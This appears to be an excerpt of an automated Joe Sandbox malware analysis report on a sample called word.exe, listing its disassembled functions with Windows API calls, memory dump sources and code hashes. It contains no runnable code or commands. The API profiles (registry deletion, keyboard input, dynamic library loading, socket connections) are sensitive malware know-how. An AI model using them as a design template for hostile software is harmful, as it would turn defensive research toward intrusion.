                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID: *.*
                                                                            • API String ID: 1795658109-438819550
                                                                            • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                            • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                            • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                            • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                            Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                            • GetFocus.USER32(?,00000001,004848E8,004848E8,?), ref: 004609EF
                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                            • EnumChildWindows.USER32 ref: 00460A60
                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                            • String ID: %s%d
                                                                            • API String ID: 991886796-1110647743
                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                            Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_sprintf
                                                                            • String ID: %02X
                                                                            • API String ID: 891462717-436463671
                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                            Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?), ref: 00410150
                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                            • String ID: $OH$@OH$X
                                                                            • API String ID: 3491138722-1394974532
                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                            Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?), ref: 00463E68
                                                                            • GetProcAddress.KERNEL32(?,00000000,?), ref: 00463E84
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,00000000,?), ref: 00463ECE
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 2449869053-0
                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                            Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 3031425849-0
                                                                            • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                            • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                            • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                            • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                            Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 0044232B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 2095303065-0
                                                                            • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                            • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                            • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                            • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                            Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0045C2F4
                                                                            • GetPrivateProfileSectionW.KERNEL32 ref: 0045C31B
                                                                            • WritePrivateProfileSectionW.KERNEL32 ref: 0045C363
                                                                            • WritePrivateProfileStringW.KERNEL32 ref: 0045C385
                                                                            • WritePrivateProfileStringW.KERNEL32 ref: 0045C392
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                            • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                            • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                            • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                            Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 659298297-0
                                                                            • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                            • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                            • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                            • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                            Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(002BE158,000000F1,00000000,00000000), ref: 004414C6
                                                                              • Part of subcall function 004413F0: SendMessageW.USER32(002BE158,000000F1,00000001,00000000), ref: 004414F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                            • String ID:
                                                                            • API String ID: 142311417-0
                                                                            • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                            • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                            • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                            • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                            Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0044955A
                                                                              • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                            • _wcslen.LIBCMT ref: 004495C1
                                                                            • _wcslen.LIBCMT ref: 004495CE
                                                                            • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 1843234404-0
                                                                            • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                            • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                            • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                            • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                            Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                            • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                            • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                            • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                            Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00445721
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                            • _wcslen.LIBCMT ref: 004457A3
                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3087257052-0
                                                                            • Opcode ID: 26db20d7f247ea922bda5968985a175caa13d0c4701d936ec62fbed3d9b395f5
                                                                            • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                            • Opcode Fuzzy Hash: 26db20d7f247ea922bda5968985a175caa13d0c4701d936ec62fbed3d9b395f5
                                                                            • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                            Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00459DEF
                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                            Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                            • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 245547762-0
                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                            Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
